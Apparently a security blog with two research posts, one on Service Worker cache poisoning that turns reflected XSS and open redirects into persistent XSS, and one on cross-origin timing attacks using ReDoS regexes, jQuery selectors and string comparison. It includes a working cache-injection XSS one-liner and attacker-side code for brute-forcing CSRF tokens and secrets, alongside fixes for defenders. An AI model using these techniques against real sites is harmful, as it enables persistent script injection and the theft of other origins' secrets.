If the demo doesn't work for you, that probably means you navigated to the attack page before caching the CORS response. If that's the case, you'll need to clear the cache and start over.

Note you need Chrome 43 or later for this to work (or a nightly version of Firefox with the flags flipped). Hope this clarifies things a bit!

Monday, May 25, 2015

[Service Workers] New APIs = New Vulns = Fun++


Just came back from another great HackPra Allstars, this time in the beautiful city of Amsterdam. Mario was kind enough to invite me to ramble about random security stuff I had in mind (this year, Service Workers). The presentation went OK, and it was super fun to meet up with so many people and watch all those great presentations.

In any case, I promised to write a blog post repeating the presentation in written form. I was hoping to watch the video first, to see what mistakes I might have made and correct them here, but the video is not online yet. So, until then, this post is about something that wasn't mentioned in the talk.

This is about the types of vulnerabilities that applications using Service Workers are likely to create. To start, I just want to say that I totally love Service Workers! The APIs are easy to use and understand, and the debugging tools in Chrome are beautiful and well done (very important, since tools such as Burp or TamperChrome wouldn't work as well with offline apps, as no requests are actually made). You can clearly see that a lot of people have thought a lot about this problem, and there is some serious effort around making offline application development possible.

The reason this content wasn't part of the presentation is that I thought the talk already had too much material. If you don't know how Service Workers work, you might want to see the first section of the slides (it's an introduction), or you can read this article or watch this video.

Anyway, back to business.. Given that there aren't many "real" web applications using Service Workers yet, I'll be using the service-worker samples from w3c-webmob. But as soon as you start finding real service worker usage, take a look and let me know if you find these problems too!

There are two main categories of potential problems I can see:
  1. Response and Caching Issues
  2. JavaScript Web Development

Response and Caching Issues

The first "category" or "family" of problems are response and caching issues. These are issues that are present because of the way responses are likely to be handled by applications.

Forever XSS

The first problem, which is probably kind-of bad, is the possibility of turning a reflected XSS into a persistent XSS. We've already seen this type of problem with APIs like localStorage before, but what makes this different is that the Cache API is actually designed to do exactly that!

When the site is about to request a page from the web, the service worker is consulted first. The service worker at this point can decide to respond with a cached response (the logic is totally delegated to the Service Worker). One of the main use cases for service workers is to serve a cached copy of the request. This cache is programmatic, and it's totally up to the application to decide how to handle it.

One coding pattern for Service Workers is to respond with whatever is in the cache, if available, or to make a request if not (and cache the response). In other words, in those cases, no request is ever made to the server if the request matches a cached response. Since this Cache database is accessible to any JS code running in the same origin, an attacker can pollute the Cache with whatever it wants and let the client serve the malicious XSS forever!
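That pattern tends to look something like this (a minimal sketch, not taken verbatim from any particular sample):

self.addEventListener('fetch', function(e) {
  e.respondWith(
    caches.match(e.request).then(function(cached) {
      if (cached) return cached;  // cache hit: the server is never asked
      return fetch(e.request).then(function(response) {
        var copy = response.clone();
        caches.open('v1').then(function(cache) {
          cache.put(e.request, copy);  // cache it for next time
        });
        return response;
      });
    })
  );
});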

If you want to try this out, go here:

Then fake an XSS by typing this to the console:
caches.open('prefetch-cache-v1').then(function(cache){cache.put(new Request('index.html', {mode: 'no-cors'}), new Response('\x3cscript>alert(1)\x3c/script>', {headers: {'content-type': 'text/html'}}))})

Now whenever you visit that page you will see an alert instead! You can use Control+Shift+R to undo it, but when you visit the page again, the XSS will come back. It's actually quite difficult to get rid of this XSS: you have to manually delete the cache :(.

This is likely to be an anti-pattern we'll see often in new Service-Worker-enabled applications. To prevent it, one of the ideas from Jake Archibald is to simply check the "url" property of the response: if the URL is not the same as the request's, simply don't use it, and discard it from the cache. This idea is quite important, and I'll explain why below.
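In code, that check could look like this (a sketch):

self.addEventListener('fetch', function(e) {
  e.respondWith(
    fetch(e.request).then(function(response) {
      // If the response ended up coming from somewhere else (eg, via a
      // redirect), don't render it and don't cache it.
      if (response.url !== e.request.url) return Response.error();
      return response;
    })
  );
});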

When Secure Open Redirects become XSS

A couple of years ago, in a presentation with thornmaker, we explained how open redirects can result in XSS and information leaks; they were mostly limited to things such as redirecting to insecure protocols (like javascript: or data:). Service Workers, however, and specifically some of the ways the Cache API is likely to be used, introduce yet another possibility, and one that is quite bad too.

As explained before, the way people seem to be coding against the Cache API is by reading the Request, fetching it, and then caching the Response. This is tricky, because when a service worker renders a response, it renders it from the same origin it was loaded from.

In other words.. let's say you have a website that has an open redirect..
  • https://www.example.com/logout?next=https://www.othersite.com/
And you have a service worker like this one:
  • https://googlechrome.github.io/samples/service-worker/read-through-caching/service-worker.js
What that service worker does, like the previous one, is simply cache all requests that go through by re-fetching them and storing the response. The catch is that the fetch will follow the open redirect, so the service worker will cache the response from evilwebsite.com for the www.example.com request!

That means that next time the user goes to:
  • https://www.example.com/logout?next=https://www.evilwebsite.com
The request will be cached, and instead of getting a 302 redirect, they will get the contents of evilwebsite.com.

Note that for this to work, evilwebsite.com must include Access-Control-Allow-Origin: * as a response header, as otherwise the request won't be accepted. And you need to make the request CORS-enabled (with a cross-origin image or embed request, for example).

This means that an open redirect can be converted into a persistent XSS, and it's another reason why checking the url property of the Response before rendering it is so important (both for responses from the Cache and for code like event.respondWith(fetch(event.request))). Even if you have never had an XSS, you can introduce one by accident. If I had to guess, almost all usages of Service Workers will be vulnerable to one or another variation of these types of attacks if they don't implement the response.url check.

There are a bunch of other interesting things you can do with Service Workers and Requests / Responses, mentioned in the talk, that I'll try to blog about later. For now, though, let's change the subject.

JavaScript Web Development

This will sound weird to some, but the JavaScript APIs in the browser don't actually include any good web APIs for building responses. What this means is that Service Workers will now be kind-of like web servers, but they are being put there without any APIs for secure web development, so it's likely they will introduce a bunch of cool bugs.

JavaScript Web APIs aren't Web Service APIs


For starters, the default concerns are things that affect existing JS-based server applications (like Node.js): things ranging from RegExp bugs (because the JS APIs aren't secure by default) to the JSON API's lack of encoding.

But a more interesting problem is that the lack of templating APIs in Service Workers means people will write code like this, which of course means it's gonna be full of XSS. And while you could import a templating library with strict contextual auto-escaping, the lack of a default library means people are likely to use insecure alternatives or just default to string concatenation (note that things like Angular and Handlebars won't work here, because they work at the DOM level, and Service Workers don't have access to the DOM, as they run way before the DOM is created).

It's also worth noting that the asynchronous nature of Service Workers (event-driven and promise-based), mixed with developers who aren't used to it, is extremely likely to introduce concurrency vulnerabilities in JS if people abuse the global scope - which, while not the case today, is very likely to be the case soon.

Cross Site Request Forgery


Another concern is that CSRF protection will have to behave differently for Service Workers. Specifically, Service Workers will most likely have to depend more on referrer/origin-based checks. This isn't bad in and of itself, but mixing this with online web applications will most likely pose a challenge to web applications. Funnily, none of the demos I found online have CSRF protection, which highlights the problem, but also makes it hard for me to give you examples of why it's gonna be hard.

To give a specific example: if a web application is meant to work offline, how would it keep track of CSRF tokens? Once the user comes back online, it's possible the CSRF tokens won't be valid anymore, and the offline application will have to handle that gracefully. While handling the fallback correctly is possible (by doing different checks depending on the online state of the application), it's likely more people will get it wrong than right.

Conclusion

I'm really excited to see what type of web applications are developed with Service Workers, and also about what type of vulnerabilities they introduce :). It's too early to know exactly, but some anti-patterns are clearly starting to emerge as a result of the API design, or of the existing mental models on developers' heads.

Another thing I wanted to mention, before closing up is that I'll start experimenting writing some of the defense security tools I mentioned in the talk, if you want to help out as well, please let me know!

Saturday, May 31, 2014

[Matryoshka] - Web Application Timing Attacks (or.. Timing Attacks against JavaScript Applications in Browsers)

Following up on the previous blog post about the wrapping overflow leak on frames, this one is also based on the presentation Matryoshka that I gave in Hamburg at HackPra All Stars 2013 during AppSec Europe 2013.

The subject today is web application timing attacks. The idea is a couple of techniques for attacking another website using timing. Timing attacks are very popular in cryptography, and usually focus on either remote services or local applications. Recently they've become a bit more popular, and are being used to attack browser security features.


Today the subject I want to discuss is attacking not the browser or the operating system, but other websites. Specifically, I want to show you how to perform timing attacks cross-domain whenever a value you control is used by another web application.


The impact of successfully exploiting this vulnerability varies depending on the application being attacked. To be clear, what we are attacking are JavaScript-heavy applications that handle data somehow controlled by another website, such as cookies, the URL, the referrer, postMessage, etc.


Overall, the attack itself isn't new, and its application to browsers is probably predictable.. but when discussed, it's frequently dismissed as unexploitable or unrealistic. Now, before I get your hopes up: while I think it's certainly exploitable and realistic, it isn't as straightforward as other attacks.


We know that you can obviously tell whether your own code runs faster or slower, but, as some of you might want to correct me, that shouldn't matter. Why? Well, because of the Same Origin Policy. In case you are not aware, the Same Origin Policy dictates that https://puppies.com can't interact with https://kittens.com. It defines a very specific subset of APIs where communication is safe (like, say, navigation, postMessage, or CORS).

The general wisdom says that to be vulnerable to information leak attacks, you need to opt in to being vulnerable to them. That is, you have to be doing something stupid for stupid things to happen to you. For example, say you have code that runs a regular expression on some data, like:

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        e.source.postMessage('got a match!', e.source);
    }
}

Well, of course it will be possible to leak information.. try it out here:

  • The secret is 0.0
  • The secret is 0.1
  • The secret is 0.2
  • ...
  • The secret is 0.9
Regexp:


You can claim this code is vulnerable and no one would tell you otherwise. "You shouldn't be writing code like this (tm)".

Now, what about this?

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
    e.source.postMessage('finished', e.source);
}

Well, now it's tricky, right? In theory, this script isn't leaking any information to the parent page (except, of course, how long it took to run the regular expression). Depending on who you ask, they will tell you this is a vulnerability (or.. not).

Now, it clearly is vulnerable, so let's figure out exactly why. There is one piece of information that is leaked: how long it took to run the regular expression. We control the regular expression, so we get to run any regular expression and learn how long it took to run.

If you are familiar with regular expressions, you might know the term "ReDoS", a family of regular expressions that perform a denial-of-service attack on the runtime because they run in exponential time. You can read more about it here. The general premise is that you can make a regular expression take forever if you want to.

So, with that information, we can do the same attack as before, but this time we infer whether we had the right match by checking whether it took over N seconds to respond to our message, or whether it returned immediately.

Let's give it a try:


  • The secret is 0.0[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.1[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.2[0-9.]+(.{0,100}){12}XXX
  • ...
  • The secret is 0.9[0-9.]+(.{0,100}){12}XXX
Regexp:



Did you notice that the right answer took longer than the others?

If you are an average security curmudgeon, you will still say that the fault lies with the vulnerable site, since it's opting in to leak how long it took to run the regular expression. All developers are supposed to take care of these types of problems, so why not JavaScript developers?

Alright then, let's fix up the code:
onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
}

That clearly has no feedback loop back to the parent page. Can we still attack it?

Well, now it gets tricky. When I told you that the Same Origin Policy isolates kittens.com from puppies.com, I wasn't being totally honest. The JavaScript code from both kittens.com and puppies.com runs in the same thread. That is, if you have three iframes, one pointing to puppies.com, one to kittens.com, and one to snakes.com, then all of them run in the same thread.

Said another way, if snakes.com suddenly decides to run an infinite loop, neither puppies.com nor kittens.com will be able to run any JavaScript code. Don't believe me? Give it a try!

[interactive demo in the original post: three iframes with running counters, plus a control that makes the snakes frame loop]

Did you notice that when you looped the snakes, the counters in the other two iframes stopped? That's because the snakes, the puppies, and the kittens all run in the same thread, and if one script keeps the thread busy, all the other scripts are paused.

Now, with that piece of information, a whole new world opens up. We no longer need the other page to surrender any information to us. Simply because it runs in the same thread we do, we can guess how long its code takes to run!

One way to attack this is by simply asking the browser to run a specific piece of code every millisecond; whenever our code doesn't run on time, that means some other code is keeping the interpreter busy. We keep track of these delays, and from them we learn how long the other code took to run.
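
A minimal sketch of that monitor (plain DOM APIs; note browsers may clamp timers to ~4ms, which is still plenty for this):

var delays = [];
var last = performance.now();

// Run (roughly) every millisecond and record how late we actually fire; a
// spike means some other script hogged our shared thread for that long.
setInterval(function() {
    var now = performance.now();
    delays.push(now - last);
    last = now;
}, 1);

// After poking the victim (e.g. frame.postMessage(guess, '*')), the largest
// recorded delay approximates how long the victim's code ran:
// Math.max.apply(null, delays);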

Alright, but you might feel a bit disappointed, since it's really not common to have code that runs regular expressions on arbitrary content... so this attack is kinda lame.

Well, not really. Fortunately, there are plenty of web applications that will run all sorts of interesting code for us. When I described the attack to Stefano Di Paola (the developer of DOMinator), he told me he had always wanted to figure out what you could do with code that does jQuery(location.hash). This used to be an XSS vector, but jQuery fixed it, so it's no longer XSS: if the string starts with a '#', it is forced to be treated as a CSS selector.

He said that perhaps jQuery could leak timing information based on how long it takes to run a specific selector. I told him that was a great idea and started looking into it. It turns out there is a "contains" selector in jQuery that will essentially look at all the text content in the page and figure out which nodes "contain" the given text.

It essentially finds a node, serializes its text contents, and then searches for the given value inside it. In a nutshell, it does:

haystack.indexOf(needle);
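
On the attacker side, driving that could look something like this (the victim URL, the container id, and the guess are all made up; the timing is done with the monitor sketched above):

var guess = 'secret-guess'; // hypothetical text we want to test for
var frame = document.createElement('iframe');
// Assumes the victim page has an element with id 'content' and runs
// jQuery(location.hash): the :contains() filter serializes the text and
// does an indexOf() over it, keeping the shared thread busy while it runs.
frame.src = 'https://victim.example/#content:contains(' + guess + ')';
document.body.appendChild(frame);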

Which is interesting, but it doesn't have the ReDoS vector we had with regular expressions. Figuring out whether there was a match is significantly more complicated: we need to know if the "haystack" search found something (or not), which sounds, well... complicated.

Can we get such granularity? Is it possible to detect the difference between "aaaa".indexOf("b") and "aaaa".indexOf("a")? There's clearly a difference in running time, but it is so small that we might not be able to measure it.

There is another, even cooler selector: the "string prefix" selector. Say you have a hidden form field like:

<input type="hidden" name="csrftoken" value="X123456789">

You can match it with:
input[name=csrftoken][value^=X]
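
Following that idea, you could try to brute-force the token one character at a time with selectors built like this (the alphabet and the loop are my own illustration):

var alphabet = '0123456789abcdef'; // hypothetical token alphabet
var known = 'X'; // characters recovered so far
for (var i = 0; i < alphabet.length; i++) {
    var selector = 'input[name=csrftoken][value^="' + known + alphabet[i] + '"]';
    // point the victim at '#' + selector and time it; the candidate whose
    // comparison runs longest shares the longest prefix with the real token
}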

But again, this is even more difficult than the indexOf() attack we were doing earlier. The question now is: can we detect string comparisons? Can we get enough accuracy out of performance.now() to know whether a string comparison succeeded?

To make the question clearer: can we measure, in JavaScript, the difference between "wrong" == "right" and "right" == "right"?

In theory, it should be faster to compare "wrong" to "right", because the runtime can stop the comparison at the first character, while to be sure that "right" is equal to "right" it needs to compare every character in the string.

This should be easy to test. In the following experiment we measure:

  • Time taken to compare "aaaa.....a" (200k characters) to "foobar"
  • Time taken to compare "aaaa.....a" to an equal "aaaa.....a"

We make each comparison 100 times to make the timing difference more explicit.
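
Reconstructed, the experiment looks roughly like this (my own version, not the original demo's code):

var a = new Array(200001).join('a'); // 200,000 'a' characters
var b = 'foobar';
var c = new Array(200001).join('a'); // same content as a, different object

function time(label, x, y) {
    var matches = 0;
    var t0 = performance.now();
    for (var i = 0; i < 100; i++) {
        if (x == y) matches++; // the comparison we are measuring
    }
    console.log(label, (performance.now() - t0).toFixed(1) + 'ms', '(' + matches + ' matches)');
}

time('aaa..a == foobar :', a, b); // different lengths: bails out immediately
time('aaa..a == aaa..a :', a, c); // equal: must walk all 200k characters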

Unless something's gone totally wrong, you should see something like:
aaa..a == foobar : 0ms
aaa..a == aaa..a : 60ms
These strange-looking results mean, mostly, that comparing two equal, very long strings takes significantly more time than comparing two obviously different strings. The "obviously", as we will learn, is the tricky part.

What the JavaScript runtimes do is first try to take a shortcut: if the lengths are different, they return false immediately. If the lengths are the same, they compare char by char, and as soon as they find a character that doesn't match, they return false.
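
In pseudocode, the equality check behaves roughly like this (a sketch of the general algorithm, not any particular engine's code):

function stringEquals(a, b) {
    if (a.length != b.length) return false; // shortcut: different lengths
    for (var i = 0; i < a.length; i++) {
        if (a[i] != b[i]) return false; // bail out at the first mismatching character
    }
    return true; // equal strings pay for every single character
}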

But is it significant? And if so, how significant? To try and answer that question, I ran several experiments. For instance, with just 18 characters it's 2 to 10 times faster to make a "false" comparison than a "true" comparison. That means "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" runs 2 to 10 times slower than "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyyy". To be able to detect that, however, we need a lot of comparisons and a lot of samples to reduce noise. In this graph you can see how many thousands of iterations you need for the measurement to "stabilize". What you should see in that graph is something like:

[graph in the original post: the true/false timing ratio settling around 6X after roughly 120,000 iterations]
What that graph means is that after 120,000 iterations (that is, 120,000 comparisons), the difference between "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyyy" and "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" is stable: the true comparison is 6 times slower. And, to be clear, that is with all 18 characters being different. This means that to notice the 6X difference you would need to brute-force all 18 characters at once, and even in the most optimistic scenario, brute-forcing 18 characters at once is way out of the question.

If you try to repeat the experiment with just 2 characters, the results are significantly different (note that this graph rounds results to the nearest integer). You won't be able to notice any difference at all: the line is flat up to a million iterations. That means that comparing "aa" vs "bb" a million times runs in about the same amount of time as comparing "aa" vs "aa" (not as impressive as our 6X!).

But we don't always need impressive differences to be able to make a decision (see this graph without the rounding). With just two characters, the difference looks roughly like this:

[graph in the original post: a noisy timing ratio hovering just above 1]

Which means it usually runs in exactly the same time, sometimes a tiny bit faster, but also many times slightly slower. In essence, a true comparison seems to take about 1.02 times as long as a false one.

Now, the fact that this graph looks so messy means our exploit won't be as reliable, and will require significantly more samples to detect any difference. What we have in our hands is a probabilistic attack.

To exploit this, we will need to perform the attack a couple hundred, a couple thousand, or a couple million times (this actually depends on the machine: a slow machine shows bigger differences but more noise, while a fast machine shows smaller differences but lets us take more accurate measurements).

With the samples, we either average the results, take the mean of means (which needs a lot of samples), run a chi-squared test (if we knew the variance), or a Student's t-test (if we could assume a normal distribution; JavaScript's garbage collector skews things a bit).
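For example, the mean-of-means aggregation could be as simple as this (a helper of my own, just to illustrate the idea):

// Average the samples in fixed-size groups, then average the group means;
// outliers (like GC pauses) get diluted inside their group.
function meanOfMeans(samples, groupSize) {
    var means = [];
    for (var i = 0; i + groupSize <= samples.length; i += groupSize) {
        var sum = 0;
        for (var j = i; j < i + groupSize; j++) sum += samples[j];
        means.push(sum / groupSize);
    }
    return means.reduce(function(m, v) { return m + v; }, 0) / means.length;
}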


At the end of the day, I ended up creating my own test, and was able to brute-force a string in a different origin via code that does:

if (SECRET == userSupplied) {
   // do nothing; the comparison itself is what leaks timing
}
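
The attacker side then looks roughly like this (all names are my own sketch, and it assumes the victim runs its comparison in a loop for every message it receives):

var frame = document.getElementById('victim').contentWindow; // hypothetical iframe

// Time one candidate: ask the victim to run its comparisons, then measure how
// long our shared thread stays blocked. Equal-length guesses that share a
// longer prefix with SECRET take longer to reject.
function timeCandidate(candidate, done) {
    var t0 = performance.now();
    frame.postMessage(candidate, '*');
    setTimeout(function() {
        done(performance.now() - t0); // fires only once the thread frees up
    }, 0);
}

// For each digit position, try '0'..'9' (padded to the secret's length) many
// times, and keep the digit with the largest average time.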

Here are some results for string comparison on Chrome:
  • It is possible to brute-force an 18-digit number in about 3 minutes on most machines.
    • Without the timing attack you would need to perform about 5 quadrillion comparisons per second. With the timing attack you only need a million.
  • It is possible to reliably recover a 9-character alphanumeric string in about 10 minutes.
    • This differs from the numeric case because here the alphabet has 37 characters, while with numbers it's just 10.
If you are interested in playing around with it, and you have patience (a lot of patience!), check this and this. They will literally take 5-10 minutes to run, and they will simply try to order 7 strings according to the time they took to compare. Both of them run about a million string comparisons using window.postMessage as the input, so it takes a while.

If you have even more patience, you can run this, which will try different combinations of iterations/samples to figure out which works best (slow machines work better with fewer iterations and more samples; faster machines work best with more iterations and fewer samples).

So, summary!
  • Timing attacks are easy thanks to JavaScript's single-threadedness. That might change with things like process isolation, but they will remain possible for the time being.
  • String comparison can be measured and attacked, but it's probabilistic and really slow with the existing attacks.
Let me know if you can improve the attack (if you can get it under 1 minute for an 18-digit number, you are my hero!), find a problem in the sampling/data, or otherwise manage to generalize the ReDoS exploit to string comparison / indexOf operations :)

Another attack that might be worth discussing: strings from different origins are stored in the same hash table. This means that if we were able to tell a hash-table miss apart from a hash-table hit, we could read strings cross-origin.

I spent a lot of time trying to make that work, but it didn't pan out. If you can do it, let me know as well :)

Thanks for reading!